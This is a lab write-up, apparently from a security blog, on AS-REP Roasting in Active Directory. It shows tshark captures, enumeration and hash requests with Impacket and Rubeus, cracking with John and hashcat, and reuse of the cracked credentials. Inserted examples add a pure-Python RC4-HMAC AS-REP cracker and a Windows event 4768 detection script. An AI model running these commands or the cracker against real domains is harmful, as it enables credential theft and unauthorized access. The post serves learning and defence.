In this post, I'm learning about Kerberos and one of its attacks, Authentication Service Response (AS-REP) Roasting. Based on my learnings, this attack should be unlikely in a well-run domain today: Active Directory requires Kerberos pre-authentication by default, and the attack only works against accounts where someone has deliberately turned that requirement off. I am, as always, doing this from the perspective of enhancing my learning. AS-REP Roasting is related to, but distinct from, Kerberoasting: Kerberoasting cracks the service ticket from a TGS-REP for an account that has a Service Principal Name, whereas AS-REP Roasting cracks the encrypted part of the AS-REP for an account that does not require pre-authentication.
First up, here is what a normal Active Directory Kerberos authentication looks like on the wire. The tshark filter keeps only AS-REQ (msg_type 10), AS-REP (msg_type 11) and KRB-ERROR (msg_type 30) messages, so the first four packets shown are the whole initial exchange.
┌──(root💀securitynik)-[~/packets]
└─# tshark -n -r AD-Authentication.pcapng -Y '(kerberos.msg_type == 10) || (kerberos.msg_type == 11) || (kerberos.msg_type == 30)'
    8  10.244059   10.0.0.108 → 10.0.0.5     KRB5 311 AS-REQ
    9  10.248297     10.0.0.5 → 10.0.0.108   KRB5 258 KRB Error: KRB5KDC_ERR_PREAUTH_REQUIRED
   16  10.259148   10.0.0.108 → 10.0.0.5     KRB5 391 AS-REQ
   17  10.261119     10.0.0.5 → 10.0.0.108   KRB5 2131 AS-REP
  153  28.562552   10.0.0.108 → 10.0.0.5     KRB5 294 AS-REQ
As shown in packet 8, the client sends an AS-REQ that carries no pre-authentication data.
In packet 9, the KDC refuses it with a KRB-ERROR, KRB5KDC_ERR_PREAUTH_REQUIRED. In packet 16 the client retries with pre-authentication data (a timestamp encrypted with the user's key), and only then, in packet 17, does the KDC return the AS-REP. The AS-REP matters because part of it is encrypted with a key derived from the user's password. Pre-authentication forces the client to prove it knows that password before the KDC hands the AS-REP out. Without the requirement, anyone who knows a username could request a Ticket Granting Ticket (TGT) for that user, take the AS-REP offline, crack the user's password from it, and then authenticate as that user.
Looking at this in practice, from an Active Directory perspective, an administrator has to deliberately turn the check off for the account by ticking "Do not require Kerberos preauthentication" in the user's account options. That sets the DONT_REQ_PREAUTH bit (0x400000) in the account's userAccountControl attribute. If a legacy application genuinely needs the setting, the account should at least get a long random password, because the offline crack that follows is only as hard as the password.
Let's now leverage a tool from the Impacket suite to see which accounts have pre-authentication disabled. Say we have access to a low-privilege account that is just a member of Domain Users; any domain user can read userAccountControl by default, so that account and impacket-GetNPUsers are enough to enumerate users with pre-authentication disabled. The UAC column in the output is the raw userAccountControl value; 0x410200 includes the 0x400000 DONT_REQ_PREAUTH bit.
┌──(root💀securitynik)-[~]
└─# impacket-GetNPUsers -dc-ip 10.0.0.5 -ts securitynik.local/nakia:Testing1
Impacket v0.9.24.dev1+20210928.152630.ff7c521a - Copyright 2021 SecureAuth Corporation

Name   MemberOf                                                                       PasswordLastSet             LastLogon                   UAC
-----  -----------------------------------------------------------------------------  --------------------------  --------------------------  --------
neysa  CN=24-baez64102-admingroup,OU=Groups,OU=SEC,OU=Tier 2,DC=securitynik,DC=local  2021-02-13 17:37:20.397803  2021-11-17 02:18:18.769182  0x410200
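What that UAC value means, and how the enumeration itself works, as an added example that is not from the post or from Impacket. The flag values are the documented userAccountControl bits; the LDAP filter uses the bitwise-AND matching rule and has the same shape as the query GetNPUsers sends (pre-auth not required, account not disabled, not a computer); the directory entries at the bottom are constructed, with neysa carrying the 0x410200 value shown above.

```python
# Added example: decode the UAC column and reproduce the AS-REP roastable-user test.

# userAccountControl bits (values from Microsoft's documentation of the attribute).
UF_ACCOUNTDISABLE = 0x0002
UF_NORMAL_ACCOUNT = 0x0200
UF_DONT_EXPIRE_PASSWD = 0x10000
UF_DONT_REQUIRE_PREAUTH = 0x400000

UAC_NAMES = {
    UF_ACCOUNTDISABLE: "ACCOUNTDISABLE",
    UF_NORMAL_ACCOUNT: "NORMAL_ACCOUNT",
    UF_DONT_EXPIRE_PASSWD: "DONT_EXPIRE_PASSWD",
    UF_DONT_REQUIRE_PREAUTH: "DONT_REQUIRE_PREAUTH",
}

# LDAP_MATCHING_RULE_BIT_AND: matches when every bit of the value is set in the attribute.
LDAP_MATCHING_RULE_BIT_AND = "1.2.840.113556.1.4.803"


def decode_uac(uac):
    """Names of the known flags set in a userAccountControl value, lowest bit first."""
    return [name for bit, name in sorted(UAC_NAMES.items()) if uac & bit]


def is_asrep_roastable(uac):
    """Pre-auth not required and the account is enabled (a disabled account never gets an AS-REP)."""
    return bool(uac & UF_DONT_REQUIRE_PREAUTH) and not (uac & UF_ACCOUNTDISABLE)


def roastable_users_filter():
    """LDAP filter equivalent to is_asrep_roastable(), usable from ldapsearch or any LDAP client."""
    return (
        "(&(userAccountControl:%s:=%d)" % (LDAP_MATCHING_RULE_BIT_AND, UF_DONT_REQUIRE_PREAUTH)
        + "(!(userAccountControl:%s:=%d))" % (LDAP_MATCHING_RULE_BIT_AND, UF_ACCOUNTDISABLE)
        + "(!(objectCategory=computer)))"
    )


def roastable_accounts(entries):
    """Apply the same test client-side to entries already in hand (an ldapsearch or PowerShell export)."""
    return [e["sAMAccountName"] for e in entries if is_asrep_roastable(int(e["userAccountControl"]))]


# Constructed entries (not from the post's lab), in the shape an LDAP client returns them.
SAMPLE_ENTRIES = [
    {"sAMAccountName": "neysa", "userAccountControl": 0x410200},   # the value the post shows
    {"sAMAccountName": "nakia", "userAccountControl": 0x10200},    # normal user, pre-auth required
    {"sAMAccountName": "oldsvc", "userAccountControl": 0x410202},  # pre-auth off, but disabled
]

if __name__ == "__main__":
    print("0x410200 =", " | ".join(decode_uac(0x410200)))
    print(roastable_users_filter())
    print(roastable_accounts(SAMPLE_ENTRIES))
```

The filter is also the quickest defensive audit: run it with ldapsearch or Get-ADUser -LDAPFilter against your own domain and every result is an account that can be roasted by any authenticated user.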
Now that we know a user has the pre-authentication check disabled, let's request a TGT on this user's behalf. At the same time, I will write the AS-REP hash to a file in John's format so we can hand it to John to crack.
┌──(root💀securitynik)-[~]
└─# impacket-GetNPUsers -dc-ip 10.0.0.5 -ts securitynik.local/nakia:Testing1 -request -format john -outputfile no-preauth.john
Impacket v0.9.24.dev1+20210928.152630.ff7c521a - Copyright 2021 SecureAuth Corporation

Name   MemberOf                                                                       PasswordLastSet             LastLogon                   UAC
-----  -----------------------------------------------------------------------------  --------------------------  --------------------------  --------
neysa  CN=24-baez64102-admingroup,OU=Groups,OU=SEC,OU=Tier 2,DC=securitynik,DC=local  2021-02-13 17:37:20.397803  2021-11-17 02:18:18.769182  0x410200
When we cat the file, we see the hash. The 32 hex characters between the colon and the $ are the 16-byte RC4-HMAC checksum that starts the AS-REP's encrypted part; everything after the $ is the RC4 ciphertext.
┌──(root💀securitynik)-[~]
└─# cat no-preauth.john
$krb5asrep$neysa@SECURITYNIK.LOCAL:3032d987619dfe5bba1bda3905f2b61e$ccd95cf20d0eff70f1e7fdadd372ca250451335cd5c30960f7f3f8c1dfa545169c73c31ca970b89ca6c5ee06cdaec5cfaea66fbcdaf0fa8e859fdbd791c9c6cbf9a699cfead4d078cdc48d44a971ebea0c76680e14c21028b5c22c9ef27999f77c867d260967b5fee9eb593a0e2fe6f4ca69188f37bdb36241761a7d4699d2a15a35fdeed80213b33ba95613fb349a9868aa178986891619705fbf6820d4e768a0477fa0964cf5608fa90dea33a2f5da58b74a24b967937fcdc436af26f65699c7b3fdc9f298289b0cb91674575df83f97f33076df7f93853462deb375528fa548aab4fda4ac6f04be421b0c6d46a4fd32585bc4948b
We can now provide the file to John along with our wordlist. Before doing that, let's look at what the request looked like on the wire.
┌──(root💀securitynik)-[~/packets]
└─# tshark -n -r no-preauth.pcap -Y '(kerberos.msg_type == 10) || (kerberos.msg_type == 11) || (kerberos.msg_type == 30)'
    4   0.000441   10.0.0.107 → 10.0.0.5     KRB5 246 AS-REQ
    5   0.002625     10.0.0.5 → 10.0.0.107   KRB5 2376 AS-REP
As seen above, there is no KRB5KDC_ERR_PREAUTH_REQUIRED error in this capture, unlike the first one: the KDC answered the very first AS-REQ (packet 4) with an AS-REP (packet 5), because the account does not require pre-authentication. Nothing in this exchange proves we know the password; that proof only comes later, offline, when we crack the AS-REP. On the domain controller the same request shows up as Security Event ID 4768 with Pre-Authentication Type 0 and a successful result code, which is the thing to alert on.
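Detection from the KDC side, as an added example that is not part of the original post. A domain controller records every AS-REQ it answers as Security Event ID 4768, and the combination that gives this attack away is Pre-Authentication Type 0 together with a successful Result Code: the KDC released an AS-REP without the client proving anything. The three event bodies below are constructed to mirror the two captures above (a normal logon, the roast, and the harmless KDC_ERR_PREAUTH_REQUIRED refusal, which releases nothing and must not be alerted on); the field names follow the Windows event text.

```python
import re

# Constructed Security log 4768 message bodies (not from the post's lab); the field names
# are those of the Windows event "A Kerberos authentication ticket (TGT) was requested".
SAMPLE_4768 = [
    # normal logon: client supplied PA-ENC-TIMESTAMP (type 2), AES256 (0x12) enc-part
    "Account Name:\t\tnakia\n"
    "Supplied Realm Name:\tSECURITYNIK.LOCAL\n"
    "Client Address:\t\t::ffff:10.0.0.108\n"
    "Ticket Encryption Type:\t0x12\n"
    "Pre-Authentication Type:\t2\n"
    "Result Code:\t\t0x0\n",
    # the roast: no pre-authentication (type 0), success, RC4-HMAC (0x17) enc-part released
    "Account Name:\t\tneysa\n"
    "Supplied Realm Name:\tSECURITYNIK.LOCAL\n"
    "Client Address:\t\t::ffff:10.0.0.107\n"
    "Ticket Encryption Type:\t0x17\n"
    "Pre-Authentication Type:\t0\n"
    "Result Code:\t\t0x0\n",
    # first AS-REQ of a normal logon, refused with KDC_ERR_PREAUTH_REQUIRED (0x19): nothing released
    "Account Name:\t\tnakia\n"
    "Supplied Realm Name:\tSECURITYNIK.LOCAL\n"
    "Client Address:\t\t::ffff:10.0.0.108\n"
    "Ticket Encryption Type:\t0xFFFFFFFF\n"
    "Pre-Authentication Type:\t0\n"
    "Result Code:\t\t0x19\n",
]

FIELD_RE = re.compile(r"^([A-Za-z][A-Za-z -]*):\s*(.*?)\s*$", re.M)
RC4_HMAC = 0x17


def parse_4768(body):
    """Turn the 'Field:<tabs>value' lines of a 4768 message into a dict."""
    return {m.group(1): m.group(2) for m in FIELD_RE.finditer(body)}


def is_asrep_roast(event):
    """A TGT was issued with no pre-authentication at all. Only a DONT_REQ_PREAUTH account can do
    that, and the AS-REP enc-part that left the KDC is now crackable offline."""
    return event.get("Pre-Authentication Type") == "0" and int(event.get("Result Code", "0x1"), 16) == 0


def triage_4768(bodies):
    """One finding per roastable request, noting whether the enc-part was RC4 (NT-hash speed) or not."""
    findings = []
    for body in bodies:
        ev = parse_4768(body)
        if not is_asrep_roast(ev):
            continue
        etype = int(ev.get("Ticket Encryption Type", "0xffffffff"), 16)
        findings.append({
            "account": ev.get("Account Name", "?"),
            "client": ev.get("Client Address", "?"),
            "rc4": etype == RC4_HMAC,
        })
    return findings


if __name__ == "__main__":
    for f in triage_4768(SAMPLE_4768):
        print("AS-REP roast of %(account)s from %(client)s, RC4=%(rc4)s" % f)
```

In a real SIEM the same rule is a filter on EventID 4768, PreAuthType 0 and Status 0x0; the Client Address then tells you which host sent the AS-REQ, which is the 10.0.0.107 Kali box in the capture above.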
Feeding the file to John:
┌──(root💀securitynik)-[~]
└─# john --format=krb5asrep no-preauth.john --wordlist=~/SEC-504/pass.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Warning: Only 5 candidates left, minimum 16 needed for performance.
Testing1         ($krb5asrep$neysa@SECURITYNIK.LOCAL)
1g 0:00:00:00 DONE (2021-11-17 03:33) 50.00g/s 250.0p/s 250.0c/s 250.0C/s sans..Testing1
Use the "--show" option to display all of the cracked passwords reliably
Session completed
Voila, now we have the user's username and password and can reuse them to gain access. Let's try listing the shares on the domain controller using smbclient.
┌──(root💀securitynik)-[~/packets]
└─# smbclient --list=10.0.0.5 --user=SECURITYNIK/neysa%Testing1 --max-protocol SMB3 --encrypt

	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	C$              Disk      Default share
	IPC$            IPC       Remote IPC
	NETLOGON        Disk      Logon server share
	SYSVOL          Disk      Logon server share
SMB1 disabled -- no workgroup available
Leveraging Rubeus for AS-REP Roasting
Now that I understand how to use Impacket for this, time to look at another tool, Rubeus. As its output shows, Rubeus first searches LDAP for roastable users itself and then sends the AS-REQ without pre-authentication for each one; /format:hashcat writes the hashes with the encryption type field that hashcat expects.
C:\Tools>Rubeus.exe asreproast /format:hashcat /dc:dc-2019.securitynik.local /outfile:asrep-roast.hashes

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v1.6.4

[*] Action: AS-REP roasting

[*] Target Domain          : securitynik.local
[*] Target DC              : dc-2019.securitynik.local

[*] Searching path 'LDAP://dc-2019.securitynik.local/DC=securitynik,DC=local' for AS-REP roastable users
[*] SamAccountName         : neysa
[*] DistinguishedName      : CN=Neysa,OU=SecurityNik-Users,DC=securitynik,DC=local
[*] Using domain controller: dc-2019.securitynik.local (10.0.0.5)
[*] Building AS-REQ (w/o preauth) for: 'securitynik.local\neysa'
[+] AS-REQ w/o preauth successful!
[*] Hash written to C:\Tools\asrep-roast.hashes

[*] Roasted hashes written to : C:\Tools\asrep-roast.hashes
Looking at the contents of the file. The $23$ field is the Kerberos encryption type: 23 is RC4-HMAC, whose key is simply the unsalted NT hash of the password, so these hashes crack far faster than the AES types 17 and 18, which derive the key with PBKDF2.

C:\Tools> type asrep-roast.hashes
$krb5asrep$23$neysa@securitynik.local...
Passing the file to hashcat in mode 18200 (Kerberos 5 AS-REP etype 23), we see the password at the end of the line below.
D:\TOOLS\hashcat-6.2.4>hashcat.exe --attack-mode 0 --hash-type 18200 c:\tmp\asrep-roast.hashes ..\pass.txt
hashcat (v6.2.4) starting
...
$krb5asrep$23$neysa@securitynik.local:4f4d040b3dffbeeac4761aa7b5f62c11$39efebf767a19822771789e8aa0286aca05383f57f421d12c7d2f12e285f66e4386a3c102c3b252b120b07de1736b80d27098907d1122c45fa79e2cf48843d16e8f96d2e1f59dfae340610b2f1ef193d634e5954a83cf340cb003ad4eed34b84deeaf1170750c59c8371decb21949a61a97d8fd66153527f7322ab5bd54f7285edaf14bcf6b20c4c6e2480ec859db8c3d784d7bcc8559faf6a2de7c20dad89fd54cf65aabac8ea92ffb4f313691ddf7ea3255486092845c3cbeb2b55b569ba5923aafb15b01379b9c919e43f9f0f321aabffbd16d53f877a650d65eca2b56741c5d17bcc73ddd69a495afc94adf77578629cc9c95750002c:Testing1
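What John and hashcat actually did per candidate, as an added example that is not code from the post, Impacket, John or hashcat. For etype 23 the check is the RC4-HMAC scheme of RFC 4757: the key is the NT hash (MD4 of the UTF-16LE password, unsalted), Ki is HMAC-MD5 of that key over key usage 8 (the number RC4-HMAC substitutes for the AS-REP enc-part's usage 3), the first 16 bytes of the enc-part are an HMAC-MD5 checksum, and the rest is RC4 under a key derived from that checksum; a candidate is right when decrypting and recomputing the checksum reproduces it. The parser accepts both the John line written by -format john and the hashcat line with the 23$ field, and rejects AES lines (etypes 17/18), which the crackers handle separately. MD4 and RC4 are implemented inline because OpenSSL 3 builds of hashlib usually ship neither; POST_LINE is the no-preauth.john content shown earlier in the post, and the candidate list in the main block is constructed.

```python
import hashlib
import hmac
import struct

MASK32 = 0xFFFFFFFF
ASREP_RC4_USAGE = 8  # RFC 4757: RC4-HMAC uses usage 8 in place of RFC 4120's 3 for the AS-REP enc-part


def _rol(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK32


def md4(data):
    """RFC 1320 MD4 in pure Python (OpenSSL 3 builds of hashlib usually do not ship it)."""
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    msg = data + b"\x80" + b"\x00" * ((55 - len(data)) % 64) + struct.pack("<Q", 8 * len(data))
    r3_order = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for i in range(16):  # round 1: F(b, c, d) = (b & c) | (~b & d)
            a = _rol((a + ((b & c) | (~b & d)) + x[i]) & MASK32, (3, 7, 11, 19)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):  # round 2: G = majority(b, c, d), columns of the message block
            a = _rol((a + ((b & c) | (b & d) | (c & d)) + x[(i % 4) * 4 + i // 4] + 0x5A827999) & MASK32,
                     (3, 5, 9, 13)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):  # round 3: H = b ^ c ^ d
            a = _rol((a + (b ^ c ^ d) + x[r3_order[i]] + 0x6ED9EBA1) & MASK32, (3, 9, 11, 15)[i % 4])
            a, b, c, d = d, a, b, c
        a, b, c, d = (a + aa) & MASK32, (b + bb) & MASK32, (c + cc) & MASK32, (d + dd) & MASK32
    return struct.pack("<4I", a, b, c, d)


def rc4(key, data):
    """Plain RC4 keystream XOR (the 'basic encrypt' of RFC 4757)."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def hmac_md5(key, data):
    return hmac.new(key, data, hashlib.md5).digest()


def nt_hash(password):
    """RC4-HMAC string-to-key: MD4 of the UTF-16LE password, no salt, no iterations."""
    return md4(password.encode("utf-16-le"))


def rc4_hmac_encrypt(password, usage, confounder, plaintext):
    """The KDC's side (RFC 4757 encrypt): checksum || RC4(Ke, confounder || plaintext)."""
    ki = hmac_md5(nt_hash(password), struct.pack("<I", usage))
    data = confounder + plaintext
    checksum = hmac_md5(ki, data)
    return checksum + rc4(hmac_md5(ki, checksum), data)


def check_asrep_rc4(password, checksum, edata2):
    """One candidate test, as john --format=krb5asrep and hashcat -m 18200 do it for etype 23."""
    ki = hmac_md5(nt_hash(password), struct.pack("<I", ASREP_RC4_USAGE))
    ke = hmac_md5(ki, checksum)
    return hmac.compare_digest(hmac_md5(ki, rc4(ke, edata2)), checksum)


def parse_asrep_line(line):
    """Accept impacket's john form ($krb5asrep$user@REALM:cs$ct) and the hashcat form ($krb5asrep$23$...)."""
    parts = line.strip().split("$")
    if len(parts) == 5 and parts[1] == "krb5asrep" and parts[2] == "23":
        del parts[2]
    if len(parts) != 4 or parts[1] != "krb5asrep" or ":" not in parts[2]:
        raise ValueError("not an etype-23 $krb5asrep$ line: " + line[:40])
    principal, checksum_hex = parts[2].split(":", 1)
    return principal, bytes.fromhex(checksum_hex), bytes.fromhex(parts[3])


def crack_asrep(line, wordlist):
    """Return the first candidate that verifies, or None."""
    _, checksum, edata2 = parse_asrep_line(line)
    for candidate in wordlist:
        if check_asrep_rc4(candidate, checksum, edata2):
            return candidate
    return None


# The no-preauth.john line from earlier in the post.
POST_LINE = (
    "$krb5asrep$neysa@SECURITYNIK.LOCAL:3032d987619dfe5bba1bda3905f2b61e$"
    "ccd95cf20d0eff70f1e7fdadd372ca250451335cd5c30960f7f3f8c1dfa545169c73c31ca970b89ca6c5ee06cdaec5cfaea66fbcdaf0fa"
    "8e859fdbd791c9c6cbf9a699cfead4d078cdc48d44a971ebea0c76680e14c21028b5c22c9ef27999f77c867d260967b5fee9eb593a0e2f"
    "e6f4ca69188f37bdb36241761a7d4699d2a15a35fdeed80213b33ba95613fb349a9868aa178986891619705fbf6820d4e768a0477fa096"
    "4cf5608fa90dea33a2f5da58b74a24b967937fcdc436af26f65699c7b3fdc9f298289b0cb91674575df83f97f33076df7f93853462deb3"
    "75528fa548aab4fda4ac6f04be421b0c6d46a4fd32585bc4948b"
)

if __name__ == "__main__":
    # constructed candidate list; the post's real wordlist only shows its first and last entries
    print(crack_asrep(POST_LINE, ["sans", "Password1", "Winter2021", "Testing1"]))
```

rc4_hmac_encrypt is the KDC's side of the same scheme, so you can build an AS-REP enc-part for any password you choose, wrap it in a $krb5asrep$23$ line and watch the cracker recover it. With the unsalted NT hash as the only secret, each candidate costs one MD4, three HMAC-MD5s and one RC4, which is why the post's wordlist run finished in well under a second.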
As before, now that we have the password, we can authenticate as the user:
C:\Tools>runas /user:securitynik\neysa cmd.exe
Enter the password for securitynik\neysa:
Attempting to start cmd.exe as user "securitynik\neysa" ...
Good start. That was a good piece of learning for me, as I look to expand my knowledge on Kerberos.